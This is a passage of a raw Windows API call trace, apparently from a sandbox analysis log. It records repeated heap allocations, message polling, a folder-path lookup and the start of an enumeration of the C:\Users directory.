Flags=0x0, Size=0x40) returned 0x3216638 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.092] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.093] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e2e8 [0056.095] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328edb0 [0056.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e2e8 | out: hHeap=0x660000) returned 1 [0056.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257390 [0056.097] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.097] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.097] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.097] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.097] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.097] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.097] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.098] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328edb0 | out: hHeap=0x660000) returned 1 [0056.098] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.098] PathFindFileNameW (pszPath="") returned="" [0056.098] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.098] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.098] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.098] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e590 | out: hHeap=0x660000) returned 1 [0056.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee50 | out: hHeap=0x660000) returned 1 [0056.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee50 [0056.098] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.098] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee50 | out: hHeap=0x660000) returned 1 [0056.098] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.099] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0056.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0056.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0056.099] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257390 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0056.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257390 | out: hHeap=0x660000) returned 1 [0056.099] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257390 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0056.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257390 | out: hHeap=0x660000) returned 1 [0056.099] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257390 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0056.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257668 [0056.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0056.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257390 | out: hHeap=0x660000) returned 1 [0056.099] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) 